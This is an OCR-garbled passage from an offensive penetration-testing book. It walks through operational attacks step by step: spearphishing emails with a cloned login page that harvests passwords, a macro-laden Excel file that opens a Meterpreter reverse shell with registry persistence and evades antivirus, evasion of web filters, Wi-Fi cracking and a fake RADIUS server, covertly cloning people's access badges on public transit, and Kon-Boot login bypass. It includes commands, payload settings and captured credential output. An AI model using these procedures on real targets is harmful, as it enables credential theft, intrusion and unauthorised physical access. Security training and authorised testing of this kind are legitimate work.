script will modify an html page that will get sent to all it’s victims. Take time to read and understand 
the code before executing. Let's walk through a phishing example. 
Setting up the client to send out emails: 
e cd /opt/spearphishing/client 
e edit spear.py and modify the following: 
o domain = "suck.yourdomainthatyouown.com" #The Domain That You 
Own 
o company name — "SUCK" ZThe Company Name 
о me = "auto-confirm@" + domain ZEmail return address 
o host = 'smtpout.secureserver.net #Godaddy SMTP server 


o login =" #Godaddy Login 
o password = " #Godaddy password 
о edit emails.txt and add email addresses 


To run the SMTP script: 
ө python ./spear.py 


Gosable* Rcookies FCSS* forms" laDimages* f informations @Misceltaneous* Outlines S Resize f Tools* <>View Sources НС 
«и ES 
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inbox (91,911) auto-confirm@suck.alertsmonitor.com 10:41 PM (8 mi 
important tome ~ 






Your Suck order of "2" x TV Stick. inbox 


Chats 
Sent Май 
Drafts (206) Your Recommendations Your Account SUCK 


> Circles SUCK 





Кы Order Confirmati 
Order 8142-3644477-72228 
Thank you for shopping with us. We'll send a confirmation once your items have shipped. Your order details are 
indicated below. If you would lice to view the stalus of your order or make any changes to it, please visit Your 
Orders on SUCK.com. 
Your estimated delivery date is: Your order will be sent to: 
Wednesday, December 3, 2014 John 
Your shippin d 3491 OCEAN CUT LN 
rii scies VIRGINIA BEACH, VA 23451-4106 
Two-Day Shipping United States 
GET A $10 GIFT CARD upon approval for he Store Card 
Order Details 
Order #142-3644477-72229022 
Placed on Thursday, November 13, 2014 
2 x TV Stick $39.00 


Electrc (or less) 





SEC SICK DE 
https: / /suck.alertsmonitor.com/?id session»0585e69bbc9e4040bbc9e4040f3268e7&ge ME REOS 


Sample Spearphishing Email 


If you look closely at the bottom, all URLs point to our domain with both the session ID and ge ID. 
One thing you need to do is heavily test your phishing exercises. There are some phishing campaigns 
that get flagged as SPAM and others that don’t. You need to find that right balance. 


Web Filtering Bypass for Your Domains: 
Once in a while, I will see a company actively using a web proxy for all of their Internet traffic. In 


this situation, anything that isn't categorized will be blocked and my reverse shells can’t seem to work 
around their filter. However, there are things you can do to help your success rate. For doppelganger 
domains that I have purchased specifically for testing, I set up a simple CNAME or Canonical Name 
on that domain to point to the original domain that I have doppelgangered. I will let that doppelganger 
domain sit there for a few days or weeks before the test. Why? This will allow the site to get 
automatically crawled by a number of different systems. When the crawlers see the CNAME 
configured to the real site, they will assume that it was purchased by that company and turn that 
domain into the same category of approved domains. Once your test starts, just remove the CNAME 
and configure the IP of the actual malicious server. 


Setting Up the Server: 


We are going to setup a web server that will look like a real authentication page to capture 
credentials. 

e cd /opt/set 

e /setoolkit 

e 1) Social-Engineering Attacks 

e 2) Website Attack Vectors 

e 3) Credential Harvester Attack Method 

e 2) Site Cloner 

e set:webattack> IP address for the POST back in Harvester/Tabnabbing: [your kali 

IP] 

e set: webattack^ Enter the url to clone: [Website to Clone] 


meterpreter » kerberos ticket purge 
[+] Kerberos tickets purged 
meterpreter > kerberos ticket use /opt/ticket. txt 
[*] Using Kerberos ticket stored in /opt/ticket.txt, 1093 bytes 
[+] Kerberos ticket applied successfully 
meterpreter > kerberos ticket list 


Kerberos Tickets 


End 
krbtgt/ħacker @ hacker lab @ hacker 2015-01-07 08:37:54.000 2025-01-07 08:37:54.000 
E, FORWARDABLE) 





File Edit View Search Terminal Help 
to a report 
[-] This option is used for what IP the server will POST to. 
[- | If you're using an external IP, use your external IP for this 
> IP address for the POS! back in Harvester/labnab192 
[-] SET supports both HTTP and HITPS 
[-] Example: http://www.thisisafakesite.com 
& > Enter the url to clone:https:// suck.testlab 


ALL files have been copied to /var/www 
(Press return to continue]l| 
Social Engineering Toolkit - Clone Site 


Let's make some quick modifications. To help make spear phishing more successful, make sure it 
looks authentic and minimize the amount of information the user needs to input. A simple way to 
accomplish this is to add their email address in the login field. This makes it look like they have 
logged onto this site before. 


Once you have cloned a site, all files are copied to /var/www. Let's modify the files: 
1. cd /var/www 


2. We need to make the file be able to support server side scripting 


1. mv index.html index.php 





3. We need to identify the username field. If we open the original login page, right-click in the 
Username Field, and Inspect Element (in Firefox). We can quickly see where the code is in this 
field and modify our file to include the victim’s email address. 


Username 


Password 


Paste 


Sign in Select All 
Add a Keyword for this Search. 
Check Spelling 
Inspect Element (Q) 
© Web Developer 
В NoScript 





Y Inspect Element with Firebug 


> Console @ Debugger [Z Style Editor © Performance F Network 
t t enterprise vy wiappe liv.site.clearf #site-contasne ted ‹ ta 





Fake Login Page | 


4. gedit index.php and locate the code from step 3 (in this specific scenario, we case search for 
login field) and add the code below. This automatically appends the user’s email in the login 
field and 4b is used solely for tracking purposes. 


1. Inside the login input field, add: value="<?php  if(üisset($ GET['ge'])) {echo 
base64 decode($ GET['ge'];) ?»" 

2. Somewhere below, add: <input type="hidden"  name-"user id" value="<?php print 
$ GET["id_session"];?>"/> 
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Code Modifications to Include User Email Address 


Now, we can go visit the cloned website we created. If we add two additional parameters to the 
index.php page, we can see how this small change can increase our success rate. The ge field accepts 
a base64 string using “Ym9va0BOaGVOY WNrZXJwbGF5Ym9vay5jb20=, which decodes to 
book@thehackerplaybook.com. There is also an id_ session field that is just an MD5 of the original 
email address. I do this in the event they decide to change the username email address to a different 
email address, I will know which original user is inputting these requests. 


€ > suck.testlab/ind 





o Disable- Ж Cookies- 2 CSS- а Forms- ШШ Images- o Information- L3 Miscellaneous p Outline- 


Sign in 


Username 


book@thehackerplaybook.com 


Password 


Sign in 


Login with User Email 


When anyone types in their password and hits the “Sign in" button, this information will all be logged 


to a file called harvester, along with the date. Let's read the file by: cat harvester* 


# cat harvester* 
Array 
( 
authenticity token] => 8nU5hP60AAKZo5KAw== 
login] => book@thehackerplaybook.com 


user_id] => 58330bcfdb5c499194603048c3810134 


[ 
[ 
[password] => happyhacking! 
[ 
[commit] => Sign in 





# 
i Password Results 


The reason I go through the manual method of creating spear phish emails and client servers, is to 
have it look as authentic and specific as possible. There are a lot of different tools that can be 
purchased to provide spear phishing campaigns, but most are limited in the types of sites or templates 
that are included. 


Social Engineering with Microsoft Excel 


In the first book, I explained how to add macros manually to create malicious Excel payloads that can 
be used in Spear Phishing Campaigns. This section is an extension of that. 


Sometimes you find yourself in an environment where you can't use JAVA or web-based attacks. It 
might be because you have to deliver your payload via an email attachment or want to use physical 
media for your attack (i.e. USB sticks or CDs). One of the best success rates I have had with these 
types of attacks was by utilizing a trust relationship between the attacker and victim and including an 
Excel spreadsheet that had a Meterpreter payload. When I say a trust relationship, I mean find 
someone with whom the victim might regularly communicate files and spoof his or her email address. 
Even better, in the initial Compromised List section, you might have been able to gain a few 
credentials. Log into the corporate Outlook Web Access (OWA) mail server and start emailing 
employees that have regular communication with your compromised credential. 

The problem with using Metasploit to generate its own Excel files is that a lot of times they will 
trigger anti-virus. To mitigate this, we are going to use the same tactics we did in the Lateral 
Movement section and take advantage of PowerShell. 


On your Windows Attacking Host, download Generate-Macro.ps1: 
https://raw.githubusercontent.comyenigma0x3/Generate-Macro/master/Generate-Macro.ps1 


Generate-Macro.psl creates a malicious Excel file with a PowerShell payload to connect back to a 
Metasploit Meterpreter handler. It even goes one step farther and adds persistence by creating a vbs 
file in the C: users public folder and adding a registry setting to call that script upon bootup. 


C:\Users\hp2\Downloads\Generate-Macro-master>powershell -exec bypass 

PS C:\Users\hp2\Downloads\Generate-Macro-master> .\Generate-Macro.ps1 

Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): 
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke- 
-Shellcode.ps1 

Enter IP Address: 192.168.199.128 

Enter Port Number: 443 

Enter the name of the document (Do not include a file extension): records 


-------- Select Attack--------- 

1. Meterpreter Shell with Logon Persistence 

2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local 
admin) 

3. Meterpreter Shell with Microsoft Outlook Email Persistence 


1. Meterpreter Reverse HTTPS 
2. Meterpreter Reverse HTTP 


Select Payload Number & Press Enter: 1 
Saved to file C:\Users\hp2\Desktop\records.xls 


Next, we need to setup our standard Meterpreter Handler: 
e cd /opt/ 
e msfconsole -r ./listener.rc 


Open up the Excel file: 
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Excel Malicious File 


Here is the Macro File that was generated by the PowerShell Script: 












е5 - Module] x 


Malicious Macro File 


When you enable the Macro, it will connect back to your Kali Meterpreter handler: 





Excel Execution - Meterpreter 


The script will also add persistence. It creates a file in C:NUsers Public called config.vbs. It also 
creates a registry entry under: HKCU\Software\Microsoft\Windows 
NT\CurrentVersion\Windows\Load to start that vbs file upon bootup. 


So, every time this system reboots, the PowerShell script will download invoke-shellcode and 
connect back to your Meterpreter handler. 
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Registry Persistence 


I ran these Excel files through numerous AV tools and not a single one triggered. As long as you can 
get a user to enable the Macro, you are good to go. 


Phishing Reporting 


As stated many times throughout this book, the most important part of any test is reporting. I have 
linked a sample phishing report that you can use as a template. 
e Work with the security team to figure out how many users reported the phish 
e Record information that includes how many users clicked/opened the attachment and 
how many conversions (i.e. entered password/executed malicious files) 
e Identify if the security team would have been notified by their users if this had been 
a real attack 
e Since every social engineering attack is very different, a section should include 
reasons for successes or failures 
e Remediation plan or areas to improve results 


I haven't seen many public templates for phishing campaigns, but have 
included a sample report at: 


http://thehackerplaybook.com/Download/2015 RT Phishing SUCK REPORT.pdf. 


The Onside Kick - Attacks That Require Physical 
Access 


The onside kick is a dangerous tactic that provides huge beneficial results. The problem with these 
types of attacks is that they generally require close proximity and have high potential of alarming your 
victim. In this chapter, I will explain how to exploit wireless networks, card cloning, creating a 
penetration drop box, and dropping USB sticks. Please remember, if you are going to do these types 
of attacks, then get written approval from the company with which you are working. 


Exploiting Wireless 

Before we begin talking about exploiting wireless, I want to state that many of the basic attacks for 
WIFI haven’t changed from the previous book. To eliminate the need to carry two books, I have 
included the relevant WIFI material from the last book along with the newer attacks. 


I am often asked what the best card is for wireless sniffing and attacking. I don't have the exact 
technical comparison, but from my experience, I have had the most success and luck with the Alfa 
AWUSO036NHA. {31} This USB wireless adaptor supports 802.11 a/b/g/n and works natively with 
Backtrack and Kali. This card also uses the Atheros chip set, of which I am a big fan. The reason that 
I use a USB wireless card is that my Kali system is generally a VM, which can't utilize the native 
built-in wireless card. 


Passive - Identification and Reconnaissance 
Passive WIFI testing puts the WIFI card in a sniffing mode to identify access points, clients, signal 
strengths, encryption types, and more. In a passive mode, your system will not interact with any of the 
devices, but this mode is used for recon/identification. 
To start any WIFI assessment, first kick off Kismet. Kismet is a great WIFI tool to sniff, identify, and 
monitor wireless traffic. At any terminal window in Kali, type: 

e kismet 


This will open the Kismet application, which will need your wireless interface information (you can 
do a quick ifconfig on a separate terminal window to find this information). In this case, my wireless 
interface is on wlanl. 


If everything works properly, you can close that window (try pressing the tab button if you are stuck) 
and you will see a listing of all the SSIDs, channels, signal strength, and more. 


Kismet Sort View Windows 





SSIDs and AP information 


The colors of the different wireless networks represent the following: 
ө Yellow - Unencrypted Network 
e Red - Factory default settings in use 
e Green - Secure Networks (WEP, WPA, etc.) 
e Blue - SSID cloaking on / Broadcast SSID disabled {32} 


After selecting an SSID, you will immediately see information about that Access Point such as the 
BSSID, manufacturer, type of encryption (in this 

case WEP), and signal strength/packet loss. This is great for identifying where an access point is 
located and how we are going to attack it. 


By pressing the "~" (tilde) key, V key, and then the C key, you will see all the clients that are 
connected to this access point. 
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File Edit View Search Terminal Help 





Finding Clients Connected to an AP 


This is useful when doing de-authentication attacks or denial of service attacks against the access 
point in the Active Attacks section. 


Active Attacks 


After you identify the networks you are to attack or networks that are within scope of your 
assessment, you need to figure out which active attacks to use. We are going to focus on four main 
types of attacks-those against WEP, WPAv2, WPA WPS, and WPA Enterprise. 


One thing I want to reiterate is that we are going for the quickest and easiest way to crack wireless 
passwords or gain access to a wireless infrastructure. There are many different tools to attack WIFI 
(aircrack-ng http://ww w.aircrack-ng.org/ is one of my favorites), but I will focus on getting the job 
complete. 


WEP - Wired Equivalent Privacy 
We should all know by now that using WEP for wireless networks is insecure. I won't go into the 


details, but if you want to read about how it was implemented and configured improperly, you can 
visit е ieu page: 
ikipedi 





If the organization is utilizing WEP and has at least one client, you should be able to crack the WEP 
password without an issue. 


To accomplish this, we are going to use the Fern- Wi-Fi-Cracker tool to identify WEP networks and 
attempt to crack them. I am using Fern-Wi-Fi-Cracker because it is native to Kali and utilizes 
Aircrack-ng (which is my favorite Wi-Fi tool). One quick caveat: for the example below, the access 
point you are attacking needs to have at least one active host on that network. There are ways to get 
around this (search Newsham's Attack), but I won't go over them in this book because the following 
attack is the most common situation you will run into. 


How to Crack WEP in Kali: 
e At a command prompt, type: 
О fern-wifi-cracker 
e Select the drop down and pick your Wi-Fi (most likely wlan0) 
e Click the Scan button 
e And drop into WEP (the red Wi-Fi sign) 





Fern WIFI Cracker 
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Fern WIFI Cracker 1.9 Fi) wra 8 Detected 


Fern WIFI Cracker 


e Select the SSID you want to attack (in this case, Rocket) 

e Click on Wi-Fi Attack on the right side 

e Watch the IV count. You will need at least 10k IVs to crack the password 
e [fitis successful, you will see ће WEP key below 


«ә 





WEP Key Cracking 


Now, you can connect to that SSID and are now on that network. 


WPAv2 (TKIP) - Wi-Fi Protected Access 
WPAv2 doesn't have a vulnerability like WEP, so cracking the password is much more difficult. To 


have a successful attack, you need to capture the authentication handshake from a client to the access 
point. To cheat in this process, we can force a user to de-authenticate and then re-authenticate. Once 
we capture the handshake, we won't be able to just strip the password out-we will have to brute- 
force or crack the password. Let's see this in progress. 


Before we can start sniffing, we need to enable the capture file settings within Fern- WiFi-Cracker, in 
order to use this handshake file to crack. 
e At a command prompt, type: 
o fern- WiFi-cracker 
e Go to the ToolBox 
e Click on the WIFI Attack Options 
e Select Capture File Settings 


WIFI Attack Settings 
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Enabling Capture File Settings 


e Hit ESC until you are back at the home screen of Fern- Wifi-Cracker 
e Select the drop down and pick your Wi-Fi (most likely wlan0) 

e Click the Scan button 

e And drop into WPA (the blue Wi-Fi sign) 

e Select your SSID to attack 

e Click on WIFI Attack 

e In the following image, you will see the cap file created 


belkin.cba 





WPA Handshake Capture 


We need to first clean the cap file to make sure it will work with our password cracker. This can be 
accomplished with wpaclean: 
e wpaclean <out.cap> <in.cap> 


Please note that the wpaclean options are the <out.cap> <in.cap> instead of <in.cap> <out.cap> 
which may cause some confusion. {33} 


To crack the WPA handshake, we need to convert the clean cap file into an hccap file. We are going 
to do this with aircrack-ng: 

ө aircrack-ng <out.cap> -J <out.hccap> 

e Note the -J is an upper case J and not lower case j. 


:~/Desktop# wpaclean out.cat 
Pwning belkin.cba Capture File(WPA). 
Net 94:44:52: belkin.cba 


:~/Desktop# aircrack-ng out.cap -J ‹ 
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Cleaning WPA Files 


This will give you the file that you use to crack into oclHashcat. Remember that the only way to get 
the password for WPAv2 is to brute-force the password. To see how to accomplish WPAv2 hccap 
password-cracking, go to the Cracking WPAv2 with oclHashcat section below. 


WPAv2 WPS (Wi-Fi Protected Setup) Attacks 

WPS (originally known as Wi-Fi Simple Config) was created to make it simple to establish a secure 
connection to a wireless router/access point.{34} All you need to do is to enter a PIN when 
connecting to an access point without knowing the long complex password. The issue stems from the 
fact that the PINs required could be brute-forced relatively quickly. {35} What's even better is that on 
some access points you cannot disable WPS even if you turn it off in the configuration page. As you 
saw previously with Kismet, the manufacturer of the device can be identified via passive sniffing. 
Here is a Google document that lists a large number of vulnerable devices and the tools that could be 
used to attack WPS: 


The steps to attack WPS are similar to WPAv2, but instead of a Regular Attack, pick the WPS Attack 
and wait for the results. The same Google document just referenced gives the estimated time it would 
take to attack that specific device. 


Attack Panel 
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_ WPS Attack 


WPA Enterprise - Fake Radius Attack 
One of my favorite attacks for enterprise environments is the fake radius attack. The problem with 


WPAv2 Enterprise networks is that all the normal WEP/WPAv2 TKIP type attacks do not work. To 
get around this, Josh Wright developed a method to capture username/password combinations for 
WPAv?2 Enterprise-grade wireless using a radius server. {36} 


Configuring a Radius server 
To configure your Radius server, we need to download and modify it. Download the Radius software 
(Research, concept, and code originated from: 





i E. я 
ө weet ftp://ftp.freeradius. org/pub/freeradius/old/freeradius- server-2.1.12.tar. bz 
e tar xfj freeradius-server-2.1.12.tar.bz2 
e cd freeradius-server-2.1.12 
e wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch 
e We need to next patch our Radius server: 
o patch -p1 < freeradius-wpe-2.1.12.patch 
o /configure && make && make install 
e We need to edit the configurations: 
o cat >> clients.conf <<EOF 
o client 192.168.1.1 { 
O secret — mysecret 
oj 
o EOF 
e radiusd -X 
e In a separate terminal: 
o tail -f/usr/local/var/log/radius/freeradius-server-wpe.log 


Example Output: 
mschap: Fri Jun 7 02:19:39 2013 
username: admin 

challenge: 07:50:2a:b7:a6:4d:24:d1 

response: fce:9d:19:06:c0:79:c3:f5:ad: db: 6b:79:59: 2f: 7f: 6e:d8:05:19:¢4:5d:26:30:08 
mschap: Sat Jun 8 23:02:39 2013 

username: user] 

challenge: 34:ab:f0:95:62:52:85:40 

response: 9e:0c:e7:80:06:2£a0:0b:c3:d7:c7:d7:c6:38:ec:0a:e5:a3:57:80:33:2c:8e:0f 
mschap: Sat Jun 8 23:28:43 2013 

username: test 

challenge: 12:ea:f1:24:f5:4b:e8:7e 

response: be:17:da:45:c0:88:ed:9c:eb:c9:5c:38:b8:1£3e:8£90:cd:17:16:ad:87:b3:ed 
Once you capture the challenge/response and username for the authentication request, you can move 
on to prepping the password lists. Before you can crack the passwords, you need to convert a word 
list to be used with the Asleap application to try to brute-force passwords. This can be accomplished 
using the following code to convert the darkcOde password list into multiple output files for Asleap. 

e genkeys -r darkcOde.lst -f words.dat -n words.idx 


Asleap is a tool used to recover LEAP and PPTP type connections, which utilize a password list 
from genkeys. Asleap will take in the challenge and responses as demonstrated below. 


root@bt:~/wireless# asleap -f words.dat -n words.idx -C 07:50:2а 7:a6:4d: 24: dl -R fc:9d:19:06: 
c0:79:c3:15:ad:db:6b:79:59:2£7f:6e:d8:05:19:c4:54d:26:30:08 


asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> 
hash bytes: 0157 

NT hash: 5e75991673dfl11d5c5c4d95015bf0157 

password: hacker 


In the example above, we were able to decrypt the challenge/response ash for a WPA-Enterprise 
authentication. Now, take these credentials and log back into their wireless network. 


Wifite 
(https://github.com/derv82/wifite)(Kali Linux) 


Wifite is another WIFI attacking tool that I highly recommend using. With similar functionality to fern- 
wifi-cracker, Wifite is another gui-front end to Aircrack-ng and Reaver. In certain cases, I found 
Wifite to work better than my other tools. To start Wifite: 

e cd /opt/wifite 

e python ./wifite.py 


Once you have wifite.py running, it automatically starts scanning the networks for access points. In the 
image below, we identify a WEP network with an ESSID of “me”. 


root@kali: /opt/wifite 


File Edit View Search Terminal Help 
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Wifite Example 


Once you have identified a target, press “CTRL-C” and pick the value of the ESSID you want to 
attack. In this case, we will attack ESSID number 5. Once selected, this will kick off the WEP attack 
to capture and crack IVs. 





Successful Attack 


That’s pretty much it. Even better, if the access point isn’t vulnerable to WEP attacks, but is 
vulnerable to WPS and utilizes WPAv2, Wifite will kick off Reaver to attack WPS. If that is 
unsuccessful, it will attack WPA by disassociating clients and capturing the authentication handshake. 


WifiPhisher 

( )(Kali Linux) 

Wifiphisher is a security tool that mounts fast, automated phishing attacks against WiFi networks in 
order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike 
other methods, does not include any brute forcing. It is an easy way for obtaining credentials from 
captive portals and third party login pages or WPA/WPA2 secret passphrases. {37} 


I love seeing creative WIFI type attacks. This is nothing new in terms of standing up a cloned SSID, 
deauthing users, and cloning pages, but WifiPhishing put all these attacks together in an easy-to-use 
script. You do need to make sure that you have two USB network WIFI cards installed. 


ө cd /opt/wifiphisher/ 
e python ./wifiphisher.py 


Wifiphisher will stand up a couple web servers and clone an access point of your choice. 


root@kali: /opt/wifiphisher 


File Edit View Search Terminal Help 


] Ctrl-C at any time to-copy an access point from below 


] Choose the [ ] of the AP you wish to copy: 3 
Starting the fake access point... 


Wifiphisher 





It will deauth all other users and when they reconnect to our access point, no matter what page they 
visit, they will be redirected to our malicious page. The default page is a router web admin page, but 
we can just as easily use SET from our social engineering section and create a clone page of our 
choice. 
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Fake Authentication Page 


Another more manual approach of the same idea is the infernal-twin: 


https://github.com/entropy133 7/infernal-twin. 


Feel free to play around with these attacks, develop those that work best for your environment and 
customize them. 


Badge Cloning 


The standard in HID Badge cloning is the Proxmark 3.{38} Although this RFID tag reader/writer is a 
little pricey ($400+), it is a must have. It is important to understand frequency and card types. The kit 
from the HackerWarehouse comes with the following: 
e Low Frequency Antenna — Tuned to operate at 125 kHz and 134 kHz and is capable 
of reading proximity cards at a distance of 4cm. 
e High Frequency Antenna — Tuned to operate at 13.56 mHz and is capable of 
snooping the UID of a Mifare 1k classic card at a distance of 3cm. 
e Tag bundle — Includes three type of RFID tags: T5557 (EM4100, HID and indala 
compatible, 125 kHz) read/write card, Mifare 1K (13.56 mH2z) test card, and EM4100 
(125 kHz) test card. 
e Prox Box 


The most common HID badge card I see is the ProxCard II. This card has been around for a long time 
due to the low cost and ease of use, and is commonly seen in small/medium size companies. Many 
companies that rent space from a shared office building usually do not have a choice in which card 
their building uses. This also means these types of cards won't be going away anytime soon. 
Penetration testers love the ProxCard II because it does not have any encryption or require 
challenge/response authentication by default. 


Some companies use high frequency cards like Mifare, which use crypto; however even these have 
been found to be vulnerable. {39} In this demonstration, we will focus on the ProxCard II. 





Proxmark3 


Out of the box, the Proxcard II will need to be updated. I won’t go through every step, but a great 
place to get you started is located here: 


https://github.com/Proxmark/proxmark3/wiki/Windows 


I did have some issues trying to get the Proxmark3 to work. So, I have included my notes to help you 
get through the troubleshooting process. 


After the initial driver installation located in section - UPDATE PROXMARK TO THE NEW CDC 
Serial INTERFACE: 
e After I did FLASH New Bootrom in procedure 2 and let go of Proxmark button, it 
still only showed up under libusb-win32 device instead of on a COM port. 
e I first followed the WINDOWS PROBLEMS IN RECOGNIZING COM PORT 
section to update the drivers while the button was pushed. 
e After completing that, I let go of the button, I unplugged again, pushed button, 
replugged in, COM port showed up (only while button is pushed), and I went ahead 
and updated the FLASH - Bootrom.bat, FLASH - FPGA fullimage.bat, and FLASH - 
OS.bat. After that, I let go of the button and everything worked like a charm. Now, if 
everything is working, run the: proxmark3.exe [com port] 


There are many proxmark3 commands {40}, but we will go through the ones that matter. 
e If hid fskdemod - Realtime HID FSK demodulator (Read HID tags) 
e If hid clone - Clone HID to T55x7 (Write Tag ID) to a blank card 


1. First put the Proxmark3 into a listener mode. Any card that is within an inch of the reader will 
show the HID tags. 

2. After we remove the HID card we want to clone, we are going to configure the Proxmark3 to 
write back to a blank card. Put the blank card on the Antenna and use the command” If hid clone 


3. 


[TAG ID]” to write to that card. 
We need to verify that we wrote to that card by putting the Proxmark3 back in listener mode and 
making sure our new cloned card has the proper HID tags. 


a . MINGW32/c/Projects/Proxmark/pm3-bin-756 (cdc+lua)/p 


proxmark3.exe com4 
proxmark3> 1f hid fskdenmod 
} ; : 2884528845 (26326) 

: 2004520045 (26326) 
: 2004520045 (26326) 
: 2804528845 ‹26 326) 
: 2004520045 
: 28004528845 
: 2084528845 
: 2804528845 


Stopped © 
proxmark3> lf hid clone 2004520045 


Cloning tag with ID 2004520045 

Шай DONE? 

MER ark3> lf hid fskdenod (©) 
: 2004520045 (26326) 
: 2804528845 (26326) 
: 2004520045 (26326) 
: 2084528045 (26326) 
: 2004520045 (26326) 
: 2004520045 

: 2004520045 < 
: 2004520045 < 
: 2004520045 < 
): 2004520045 < 
: 2004520045 < 
> 2004520045 <2 
: 2004520045 < 
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I 
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ID 
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Proxmark3 - Badge Cloning 





Once you have your device configured, you can connect the external battery back to the Proxmark3, 
however, you can only clone one badge at a time. To get around this problem and the battery pack 
issue, we turn to Kali Nethunter and a Nexus 7 tablet. 


Get It Working In Kali Nethunter 


(h 


— 


s://forums.kali.org/showthread.php?23 15 1-Tutorial-make-proxmark3-works-with-nethunter): 





. Download http://thehackerplaybook.com/Download/proxdroid-bin-848.rar 


2. Inside the proxdroid rar file, you need to copy the file /system/bin/proxmark3 to the Nexus’ 


/system/bin directory. Make sure to change the permissions to [rwxr-xr-x] (chmod 755 
/systenybin/proxmark3) 


. Next, you need to copy both /system/lib/libreadline.so and /system/lib/libtermcap.so from the 


rar to the /system/lib directory with permission to [rw-r--r--] (chmod 644) 
We need to find out which port the Proxmark3 is using when connected to the Nexus Device. A 
quick way to do this is: dmesg 


[ 1449.061372] сас acm 1-2.1:1.0: ttyvACMO: USB ACM device 


[ 1449.073765] usbcore: registered new interface driver сіс acm 
[ 1449.073770] cdc acm: USB Abstract Control Model driver for 
USB modems and ISDN adapters 


. In this case our interface is using ttyACMO 


. Once we move all the files to our Nexus device and find which interface our Proxmark3 is using, 
we can start up our device: 


. proxmark3 /dev/[interface - e.g. ttyACMO] in terminal from system/bin 


. I had errors with permissions on the Nexus when moving the files to /system/bin and /system/lib. 
To fix that issue, I had to re-mount the /system folder. 


. Nexus7 Genl 


. mount -o rw,remount /dev/block/platform/sdhci-tegra.3/by-name/APP/system /system ext4 
ro,relatime,user xatttr,acl,barrier-1,data-ordered 0 0 


. Nexus7 Gen2 


. mount -o rw,remount /dev/block/platform/msm_sdcc.1/by-name/system /system 








Proxmark3 - Portable with Nexus 


Again, the issue with running a Proxmark3 with a battery pack was that you could only clone one 
card. Moreover, the issue with running it off a laptop is the size. With the Nexus tablet and a tablet 
case, I am able to power and run the Proxmark3 software with full functionality. Holding the tablet 
case, I can easily go in an elevator/subway/bus, hold my tablet case near everyone’s badge and 
constantly collect them. I can then write them out to cards and use them to walk right in. 


One other thing that I have seen from collecting tag IDs is that companies generally buy tags in bulk. 
The HID tag IDs are set at the manufacturer site, so if you collect a number of tags, you can figure out 
the ranges in which they exist. For example, in the example tag above (2004520045), we can brute- 
force through the tags near that range. Since different badges have different permissions, it is good to 
test if you are able to guess a privileged badge using something like: 


https://github.com/brad-anton/proxbrute. 


Kon-Boot 
(http://www.piotrbania.com/all/kon-boot/) (Windows/OS X) 


On a physical test, you might have gotten into the building, but you need a quick and easy way to get 
onto systems and servers. This is where Kon-boot comes into play. Kon-boot is a USB device that 
will allow you to bypass authentication on both Windows and OS X. 


On Windows, Kon-boot has additional functionality to bypass without changing the password. 
However, on OS X, you need to either reset the password to blank or create a new user. There 
software works by “virtually modifying the EFI bios and then modifying parts of the OS X kernel. 
Such changes are only made in virtual memory and they disappear after computer reboot.” 
http://www.piotrbania.com/all/kon-boot/ 


For both Windows and OS X (and Linux), there are known ways to get around authentication. On 
Windows, you can use something like ntpassword{41}, and on OS X, you can drop into single 
usermode and reset the admin password. {42} However, since my focus is really on efficiency, I'll 
you have to do is drop the USB drive, reboot, and log into your victim host. 


The installation is pretty straightforward. After you purchase the corporate version of Kon-Boot, you 
will get a Windows executable. Take any USB stick and it will install Kon-Boot onto that device. All 
you need to do now is carry this little USB device: 





X KON-BOOT USB Stick 


Windows 


On a reboot or system startup, make sure it boots from the USB drive so that Kon-Boot will kick in. 


» Kon-Boot ver. 2.4 - ready! 32/64bit ttt 
» Please note this software is protected by copyright laws. 


» Checking SMAP BIOS entries ... 
» р | letecté 





Kon-Boot Bootup 


After Kon-Boot finishes, you will come to a login screen with no password configured. Just hit 
“enter” and you will be in the system. Another benefit is that it installs the sticky key functionality to 
popup a system shell. 


The best part of Kon-Boot is that once you reboot the system, the original password will be put back 
on the system. The end user will never know what happened. 


OS X: 


OS X Kon-boot for the most part is similar to the single-user mode reset. Kon-Boot can either reset 
the user account’s password or create a new user account under kon-boot:kon-boot. 





+ [0] Use kon-boot for Windows CUEFI) 
+ [1] Use kon-boot for Mac 
Using kon-boot for Mac! 


Scanning all disk drives 

Found handles=8 (SelfHande-6CB75190) 

MacBootEfi device found, id = 2 (6F7A5390) 

MacBootEfi device found, id = 3 (6F7A3390) 

Found our drive at index=6 (out of 8) 

Found 2 mac devices! 

Installing our driver... 

Please pick your option (@-1): 

+ [0] Use bypass feature (no new account) 

+ [1] Use new-account feature (login: kon-boot password: kon-boot) 
Using bypass mode! 

Driver loaded! 

Ready for lift off! 

Everything seems to be ready «press any key to continue» 





Kon-boot on OS X 





Kon-boot - OS X No Password 


One thing to note is that this will not work against drives that are encrypted. For most tests these days, 
I am finding that laptops are more often encrypted, while desktops are not. 


Pentesting Drop Box - Raspberry Pi 2 


On a physical engagement, a pentesting drop box is essential to have in your toolkit. You can clone a 
couple badges, sneak your way into a company, drop a device onto the corporate infrastructure, and 
run. Either your drop box connects back via cellular or Wi-Fi, or it creates a remote shell back to a 
server of your choice. 


The big professional version of this is called a PwnPlug and you can purchase one from here: 
http://pwnieexpress.com/products/pwnplug- elite. The only problem is that the cost is pretty 
outrageous and the chance of losing your device is pretty high. 


In the previous Hacker Playbook, we used the oDroid U2, because of the speed and RAM 
requirements. The only downside was that although it was a fraction of the price of the PwnPlug, it 
still came to about $100 per box. If you have done a physical test before, you know you have lost a 
few in the process and $100+ adds up quick. 


Luckily for us, the Raspberry Pi 2 was released, which is now six times faster (900 Mhz Quad Core) 
and has 1GB of RAM. {43} 


You will have to buy a few items separately from the board, but not much: 


e Power Adaptor 

e USB Wi-Fi adaptor 

e 8 GB or larger microSD Class 10 or higher card 

e HDMI to view what is going on when booting the first time 





Raspberry Pi2 Running Kali Linux 


Download Kali Linux Raspberry Pi 2 
e https://www.offensive-security.com/kali-linux-vmware-arm-1mage-download/ 





Or create your own image: 
e https://itfellover.com/1-kali-from-git-clone-and-booting-in- 1 9-steps/ 





Setting up your new drop box with Kali is pretty easy. The guys over at Offensive Security did some 
great work and included ARM support specifically for one of these devices. 


Once you have downloaded or created the images for the Raspberry Pi 2, we need to install Kali on 
the microSD card. Then plug your SD card into your Kali 64bit OS and locate where that device is. 
You can use dmesg after you plug it in to see where it is installed. Make sure you have it configured 
to the right device. 


